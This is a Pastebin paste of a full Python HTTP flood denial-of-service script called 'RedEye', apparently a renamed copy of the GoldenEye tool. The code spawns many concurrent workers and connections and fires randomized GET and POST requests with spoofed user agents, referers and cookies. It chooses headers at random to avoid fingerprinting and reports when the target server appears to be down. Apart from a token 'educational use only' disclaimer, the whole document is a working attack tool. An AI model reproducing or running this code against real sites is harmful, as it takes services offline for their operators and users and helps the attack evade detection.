API tools faq
paste
Guest User

Untitled

a guest
Jul 18th, 2018
157
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.64 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2.  
  3. """
  4. # Exploit Title: [RedEye 1.0 http DDOS Script]
  5. # Date: [10.10.2015]
  6. # Exploit Author: [Dhiraj Mishra]
  7. # Vendor Homepage: [fb.com/mishra.dhiraj16]
  8. [twitter.com/mishradhiraj_]
  9. # Version: [1.0]
  10. # Tested on: ['http' WEB APPLICATIONS]
  11.  
  12. ##################################
  13. #CAPEC-469 Provided by Mitre.org #
  14. ##################################
  15.  
  16. This tool is a DOS tool that is meant to put heavy load on HTTP servers
  17. in order to bring them to their knees by exhausting the resource pool.
  18.  
  19. This tool is meant for research purposes only
  20. and any malicious usage of this tool is prohibited.
  21.  
  22. LEGAL NOTICE:
  23. THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY!
  24. IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY ,
  25. THE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT.
  26. BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS.
  27.  
  28. """
  29.  
  30. from multiprocessing import Process, Manager, Pool
  31. import urlparse, ssl
  32. import sys, getopt, random, time, os
  33.  
  34. # Python version-specific
  35. if sys.version_info < (3,0):
  36. # Python 2.x
  37. import httplib
  38. HTTPCLIENT = httplib
  39. else:
  40. # Python 3.x
  41. import http.client
  42. HTTPCLIENT = http.client
  43.  
  44. ####
  45. # Config
  46. ####
  47. DEBUG = False
  48.  
  49. ####
  50. # Constants
  51. ####
  52. METHOD_GET = 'get'
  53. METHOD_POST = 'post'
  54. METHOD_RAND = 'random'
  55.  
  56. JOIN_TIMEOUT=1.0
  57.  
  58. DEFAULT_WORKERS=10
  59. DEFAULT_SOCKETS=500
  60.  
  61. GOLDENEYE_BANNER = 'RedEye v1.0 by Mishra Dhiraj <mishra.dhiraj95@gmail.com>'
  62.  
  63. USER_AGENT_PARTS = {
  64. 'os': {
  65. 'linux': {
  66. 'name': [ 'Linux x86_64', 'Linux i386' ],
  67. 'ext': [ 'X11' ]
  68. },
  69. 'windows': {
  70. 'name': [ 'Windows NT 6.1', 'Windows NT 6.3', 'Windows NT 5.1', 'Windows NT.6.2' ],
  71. 'ext': [ 'WOW64', 'Win64; x64' ]
  72. },
  73. 'mac': {
  74. 'name': [ 'Macintosh' ],
  75. 'ext': [ 'Intel Mac OS X %d_%d_%d' % (random.randint(10, 11), random.randint(0, 9), random.randint(0, 5)) for i in range(1, 10) ]
  76. },
  77. },
  78. 'platform': {
  79. 'webkit': {
  80. 'name': [ 'AppleWebKit/%d.%d' % (random.randint(535, 537), random.randint(1,36)) for i in range(1, 30) ],
  81. 'details': [ 'KHTML, like Gecko' ],
  82. 'extensions': [ 'Chrome/%d.0.%d.%d Safari/%d.%d' % (random.randint(6, 32), random.randint(100, 2000), random.randint(0, 100), random.randint(535, 537), random.randint(1, 36)) for i in range(1, 30) ] + [ 'Version/%d.%d.%d Safari/%d.%d' % (random.randint(4, 6), random.randint(0, 1), random.randint(0, 9), random.randint(535, 537), random.randint(1, 36)) for i in range(1, 10) ]
  83. },
  84. 'iexplorer': {
  85. 'browser_info': {
  86. 'name': [ 'MSIE 6.0', 'MSIE 6.1', 'MSIE 7.0', 'MSIE 7.0b', 'MSIE 8.0', 'MSIE 9.0', 'MSIE 10.0' ],
  87. 'ext_pre': [ 'compatible', 'Windows; U' ],
  88. 'ext_post': [ 'Trident/%d.0' % i for i in range(4, 6) ] + [ '.NET CLR %d.%d.%d' % (random.randint(1, 3), random.randint(0, 5), random.randint(1000, 30000)) for i in range(1, 10) ]
  89. }
  90. },
  91. 'gecko': {
  92. 'name': [ 'Gecko/%d%02d%02d Firefox/%d.0' % (random.randint(2001, 2010), random.randint(1,31), random.randint(1,12) , random.randint(10, 25)) for i in range(1, 30) ],
  93. 'details': [],
  94. 'extensions': []
  95. }
  96. }
  97. }
  98.  
  99. ####
  100. # GoldenEye Class
  101. ####
  102.  
  103. class GoldenEye(object):
  104.  
  105. # Counters
  106. counter = [0, 0]
  107. last_counter = [0, 0]
  108.  
  109. # Containers
  110. workersQueue = []
  111. manager = None
  112. useragents = []
  113.  
  114. # Properties
  115. url = None
  116.  
  117. # Options
  118. nr_workers = DEFAULT_WORKERS
  119. nr_sockets = DEFAULT_SOCKETS
  120. method = METHOD_GET
  121.  
  122. def __init__(self, url):
  123.  
  124. # Set URL
  125. self.url = url
  126.  
  127. # Initialize Manager
  128. self.manager = Manager()
  129.  
  130. # Initialize Counters
  131. self.counter = self.manager.list((0, 0))
  132.  
  133.  
  134. def exit(self):
  135. self.stats()
  136. print "Shutting down RedEye"
  137.  
  138. def __del__(self):
  139. self.exit()
  140.  
  141. def printHeader(self):
  142.  
  143. # Taunt!
  144. print
  145. print GOLDENEYE_BANNER
  146. print
  147.  
  148. # Do the fun!
  149. def fire(self):
  150.  
  151. self.printHeader()
  152. print "Hitting webserver in mode '{0}' with {1} workers running {2} connections each. Hit CTRL+C to cancel.".format(self.method, self.nr_workers, self.nr_sockets)
  153.  
  154. if DEBUG:
  155. print "Starting {0} concurrent workers".format(self.nr_workers)
  156.  
  157. # Start workers
  158. for i in range(int(self.nr_workers)):
  159.  
  160. try:
  161.  
  162. worker = Striker(self.url, self.nr_sockets, self.counter)
  163. worker.useragents = self.useragents
  164. worker.method = self.method
  165.  
  166. self.workersQueue.append(worker)
  167. worker.start()
  168. except (Exception):
  169. error("Failed to start worker {0}".format(i))
  170. pass
  171.  
  172. if DEBUG:
  173. print "Initiating monitor"
  174. self.monitor()
  175.  
  176. def stats(self):
  177.  
  178. try:
  179. if self.counter[0] > 0 or self.counter[1] > 0:
  180.  
  181. print "{0} GoldenEye strikes deferred. ({1} Failed)".format(self.counter[0], self.counter[1])
  182.  
  183. if self.counter[0] > 0 and self.counter[1] > 0 and self.last_counter[0] == self.counter[0] and self.counter[1] > self.last_counter[1]:
  184. print "tServer may be DOWN!"
  185.  
  186. self.last_counter[0] = self.counter[0]
  187. self.last_counter[1] = self.counter[1]
  188. except (Exception):
  189. pass # silently ignore
  190.  
  191. def monitor(self):
  192. while len(self.workersQueue) > 0:
  193. try:
  194. for worker in self.workersQueue:
  195. if worker is not None and worker.is_alive():
  196. worker.join(JOIN_TIMEOUT)
  197. else:
  198. self.workersQueue.remove(worker)
  199.  
  200. self.stats()
  201.  
  202. except (KeyboardInterrupt, SystemExit):
  203. print "CTRL+C received. Killing all workers"
  204. for worker in self.workersQueue:
  205. try:
  206. if DEBUG:
  207. print "Killing worker {0}".format(worker.name)
  208. #worker.terminate()
  209. worker.stop()
  210. except Exception, ex:
  211. pass # silently ignore
  212. if DEBUG:
  213. raise
  214. else:
  215. pass
  216.  
  217. ####
  218. # Striker Class
  219. ####
  220.  
  221. class Striker(Process):
  222.  
  223.  
  224. # Counters
  225. request_count = 0
  226. failed_count = 0
  227.  
  228. # Containers
  229. url = None
  230. host = None
  231. port = 80
  232. ssl = False
  233. referers = []
  234. useragents = []
  235. socks = []
  236. counter = None
  237. nr_socks = DEFAULT_SOCKETS
  238.  
  239. # Flags
  240. runnable = True
  241.  
  242. # Options
  243. method = METHOD_GET
  244.  
  245. def __init__(self, url, nr_sockets, counter):
  246.  
  247. super(Striker, self).__init__()
  248.  
  249. self.counter = counter
  250. self.nr_socks = nr_sockets
  251.  
  252. parsedUrl = urlparse.urlparse(url)
  253.  
  254. if parsedUrl.scheme == 'https':
  255. self.ssl = True
  256.  
  257. self.host = parsedUrl.netloc.split(':')[0]
  258. self.url = parsedUrl.path
  259.  
  260. self.port = parsedUrl.port
  261.  
  262. if not self.port:
  263. self.port = 80 if not self.ssl else 443
  264.  
  265.  
  266. self.referers = [
  267. 'http://www.google.com/',
  268. 'http://www.bing.com/',
  269. 'http://www.baidu.com/',
  270. 'http://www.yandex.com/',
  271. 'http://' + self.host + '/'
  272. ]
  273.  
  274.  
  275. def __del__(self):
  276. self.stop()
  277.  
  278.  
  279. #builds random ascii string
  280. def buildblock(self, size):
  281. out_str = ''
  282.  
  283. _LOWERCASE = range(97, 122)
  284. _UPPERCASE = range(65, 90)
  285. _NUMERIC = range(48, 57)
  286.  
  287. validChars = _LOWERCASE + _UPPERCASE + _NUMERIC
  288.  
  289. for i in range(0, size):
  290. a = random.choice(validChars)
  291. out_str += chr(a)
  292.  
  293. return out_str
  294.  
  295.  
  296. def run(self):
  297.  
  298. if DEBUG:
  299. print "Starting worker {0}".format(self.name)
  300.  
  301. while self.runnable:
  302.  
  303. try:
  304.  
  305. for i in range(self.nr_socks):
  306.  
  307. if self.ssl:
  308. c = HTTPCLIENT.HTTPSConnection(self.host, self.port)
  309. else:
  310. c = HTTPCLIENT.HTTPConnection(self.host, self.port)
  311.  
  312. self.socks.append(c)
  313.  
  314. for conn_req in self.socks:
  315.  
  316. (url, headers) = self.createPayload()
  317.  
  318. method = random.choice([METHOD_GET, METHOD_POST]) if self.method == METHOD_RAND else self.method
  319.  
  320. conn_req.request(method.upper(), url, None, headers)
  321.  
  322. for conn_resp in self.socks:
  323.  
  324. resp = conn_resp.getresponse()
  325. self.incCounter()
  326.  
  327. self.closeConnections()
  328.  
  329. except:
  330. self.incFailed()
  331. if DEBUG:
  332. raise
  333. else:
  334. pass # silently ignore
  335.  
  336. if DEBUG:
  337. print "Worker {0} completed run. Sleeping...".format(self.name)
  338.  
  339. def closeConnections(self):
  340. for conn in self.socks:
  341. try:
  342. conn.close()
  343. except:
  344. pass # silently ignore
  345.  
  346.  
  347. def createPayload(self):
  348.  
  349. req_url, headers = self.generateData()
  350.  
  351. random_keys = headers.keys()
  352. random.shuffle(random_keys)
  353. random_headers = {}
  354.  
  355. for header_name in random_keys:
  356. random_headers[header_name] = headers[header_name]
  357.  
  358. return (req_url, random_headers)
  359.  
  360. def generateQueryString(self, ammount = 1):
  361.  
  362. queryString = []
  363.  
  364. for i in range(ammount):
  365.  
  366. key = self.buildblock(random.randint(3,10))
  367. value = self.buildblock(random.randint(3,20))
  368. element = "{0}={1}".format(key, value)
  369. queryString.append(element)
  370.  
  371. return '&'.join(queryString)
  372.  
  373.  
  374. def generateData(self):
  375.  
  376. returnCode = 0
  377. param_joiner = "?"
  378.  
  379. if len(self.url) == 0:
  380. self.url = '/'
  381.  
  382. if self.url.count("?") > 0:
  383. param_joiner = "&"
  384.  
  385. request_url = self.generateRequestUrl(param_joiner)
  386.  
  387. http_headers = self.generateRandomHeaders()
  388.  
  389.  
  390. return (request_url, http_headers)
  391.  
  392. def generateRequestUrl(self, param_joiner = '?'):
  393.  
  394. return self.url + param_joiner + self.generateQueryString(random.randint(1,5))
  395.  
  396. def getUserAgent(self):
  397.  
  398. if self.useragents:
  399. return random.choice(self.useragents)
  400.  
  401. # Mozilla/[version] ([system and browser information]) [platform] ([platform details]) [extensions]
  402.  
  403. ## Mozilla Version
  404. mozilla_version = "Mozilla/5.0" # hardcoded for now, almost every browser is on this version except IE6
  405.  
  406. ## System And Browser Information
  407. # Choose random OS
  408. os = USER_AGENT_PARTS['os'][random.choice(USER_AGENT_PARTS['os'].keys())]
  409. os_name = random.choice(os['name'])
  410. sysinfo = os_name
  411.  
  412. # Choose random platform
  413. platform = USER_AGENT_PARTS['platform'][random.choice(USER_AGENT_PARTS['platform'].keys())]
  414.  
  415. # Get Browser Information if available
  416. if 'browser_info' in platform and platform['browser_info']:
  417. browser = platform['browser_info']
  418.  
  419. browser_string = random.choice(browser['name'])
  420.  
  421. if 'ext_pre' in browser:
  422. browser_string = "%s; %s" % (random.choice(browser['ext_pre']), browser_string)
  423.  
  424. sysinfo = "%s; %s" % (browser_string, sysinfo)
  425.  
  426. if 'ext_post' in browser:
  427. sysinfo = "%s; %s" % (sysinfo, random.choice(browser['ext_post']))
  428.  
  429.  
  430. if 'ext' in os and os['ext']:
  431. sysinfo = "%s; %s" % (sysinfo, random.choice(os['ext']))
  432.  
  433. ua_string = "%s (%s)" % (mozilla_version, sysinfo)
  434.  
  435. if 'name' in platform and platform['name']:
  436. ua_string = "%s %s" % (ua_string, random.choice(platform['name']))
  437.  
  438. if 'details' in platform and platform['details']:
  439. ua_string = "%s (%s)" % (ua_string, random.choice(platform['details']) if len(platform['details']) > 1 else platform['details'][0] )
  440.  
  441. if 'extensions' in platform and platform['extensions']:
  442. ua_string = "%s %s" % (ua_string, random.choice(platform['extensions']))
  443.  
  444. return ua_string
  445.  
  446. def generateRandomHeaders(self):
  447.  
  448. # Random no-cache entries
  449. noCacheDirectives = ['no-cache', 'max-age=0']
  450. random.shuffle(noCacheDirectives)
  451. nrNoCache = random.randint(1, (len(noCacheDirectives)-1))
  452. noCache = ', '.join(noCacheDirectives[:nrNoCache])
  453.  
  454. # Random accept encoding
  455. acceptEncoding = ['''','*','identity','gzip','deflate']
  456. random.shuffle(acceptEncoding)
  457. nrEncodings = random.randint(1,len(acceptEncoding)/2)
  458. roundEncodings = acceptEncoding[:nrEncodings]
  459.  
  460. http_headers = {
  461. 'User-Agent': self.getUserAgent(),
  462. 'Cache-Control': noCache,
  463. 'Accept-Encoding': ', '.join(roundEncodings),
  464. 'Connection': 'keep-alive',
  465. 'Keep-Alive': random.randint(1,1000),
  466. 'Host': self.host,
  467. }
  468.  
  469. # Randomly-added headers
  470. # These headers are optional and are
  471. # randomly sent thus making the
  472. # header count random and unfingerprintable
  473. if random.randrange(2) == 0:
  474. # Random accept-charset
  475. acceptCharset = [ 'ISO-8859-1', 'utf-8', 'Windows-1251', 'ISO-8859-2', 'ISO-8859-15', ]
  476. random.shuffle(acceptCharset)
  477. http_headers['Accept-Charset'] = '{0},{1};q={2},*;q={3}'.format(acceptCharset[0], acceptCharset[1],round(random.random(), 1), round(random.random(), 1))
  478.  
  479. if random.randrange(2) == 0:
  480. # Random Referer
  481. url_part = self.buildblock(random.randint(5,10))
  482.  
  483. random_referer = random.choice(self.referers) + url_part
  484.  
  485. if random.randrange(2) == 0:
  486. random_referer = random_referer + '?' + self.generateQueryString(random.randint(1, 10))
  487.  
  488. http_headers['Referer'] = random_referer
  489.  
  490. if random.randrange(2) == 0:
  491. # Random Content-Trype
  492. http_headers['Content-Type'] = random.choice(['multipart/form-data', 'application/x-url-encoded'])
  493.  
  494. if random.randrange(2) == 0:
  495. # Random Cookie
  496. http_headers['Cookie'] = self.generateQueryString(random.randint(1, 5))
  497.  
  498. return http_headers
  499.  
  500. # Housekeeping
  501. def stop(self):
  502. self.runnable = False
  503. self.closeConnections()
  504. self.terminate()
  505.  
  506. # Counter Functions
  507. def incCounter(self):
  508. try:
  509. self.counter[0] += 1
  510. except (Exception):
  511. pass
  512.  
  513. def incFailed(self):
  514. try:
  515. self.counter[1] += 1
  516. except (Exception):
  517. pass
  518.  
  519.  
  520.  
  521. ####
  522.  
  523. ####
  524. # Other Functions
  525. ####
  526.  
  527. def usage():
  528. print
  529. print '-----------------------------------------------------------------------------------------------------------'
  530. print
  531. print GOLDENEYE_BANNER
  532. print
  533. print ' USAGE: ./RedEye.py <url> [OPTIONS]'
  534. print
  535. print ' OPTIONS:'
  536. print 't FlagtttDescriptionttttttDefault'
  537. print 't -u, --useragentstFile with user-agents to usetttt(default: randomly generated)'
  538. print 't -w, --workersttNumber of concurrent workerstttt(default: {0})'.format(DEFAULT_WORKERS)
  539. print 't -s, --socketsttNumber of concurrent socketstttt(default: {0})'.format(DEFAULT_SOCKETS)
  540. print 't -m, --methodttHTTP Method to use 'get' or 'post' or 'random'tt(default: get)'
  541. print 't -d, --debugttEnable Debug Mode [more verbose output]ttt(default: False)'
  542. print 't -h, --helpttShows this help'
  543. print
  544. print '-----------------------------------------------------------------------------------------------------------'
  545.  
  546.  
  547. def error(msg):
  548. # print help information and exit:
  549. sys.stderr.write(str(msg+"n"))
  550. usage()
  551. sys.exit(2)
  552.  
  553. ####
  554. # Main
  555. ####
  556.  
  557. def main():
  558.  
  559. try:
  560.  
  561. if len(sys.argv) < 2:
  562. error('Please supply at least the URL')
  563.  
  564. url = sys.argv[1]
  565.  
  566. if url == '-h':
  567. usage()
  568. sys.exit()
  569.  
  570. if url[0:4].lower() != 'http':
  571. error("Invalid URL supplied")
  572.  
  573. if url == None:
  574. error("No URL supplied")
  575.  
  576. opts, args = getopt.getopt(sys.argv[2:], "dhw:s:m:u:", ["debug", "help", "workers", "sockets", "method", "useragents" ])
  577.  
  578. workers = DEFAULT_WORKERS
  579. socks = DEFAULT_SOCKETS
  580. method = METHOD_GET
  581.  
  582. uas_file = None
  583. useragents = []
  584.  
  585. for o, a in opts:
  586. if o in ("-h", "--help"):
  587. usage()
  588. sys.exit()
  589. elif o in ("-u", "--useragents"):
  590. uas_file = a
  591. elif o in ("-s", "--sockets"):
  592. socks = int(a)
  593. elif o in ("-w", "--workers"):
  594. workers = int(a)
  595. elif o in ("-d", "--debug"):
  596. global DEBUG
  597. DEBUG = True
  598. elif o in ("-m", "--method"):
  599. if a in (METHOD_GET, METHOD_POST, METHOD_RAND):
  600. method = a
  601. else:
  602. error("method {0} is invalid".format(a))
  603. else:
  604. error("option '"+o+"' doesn't exists")
  605.  
  606.  
  607. if uas_file:
  608. try:
  609. with open(uas_file) as f:
  610. useragents = f.readlines()
  611. except EnvironmentError:
  612. error("cannot read file {0}".format(uas_file))
  613.  
  614. goldeneye = GoldenEye(url)
  615. goldeneye.useragents = useragents
  616. goldeneye.nr_workers = workers
  617. goldeneye.method = method
  618. goldeneye.nr_sockets = socks
  619.  
  620. goldeneye.fire()
  621.  
  622. except getopt.GetoptError, err:
  623.  
  624. # print help information and exit:
  625. sys.stderr.write(str(err))
  626. usage()
  627. sys.exit(2)
  628.  
  629. if __name__ == "__main__":
  630. main()
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!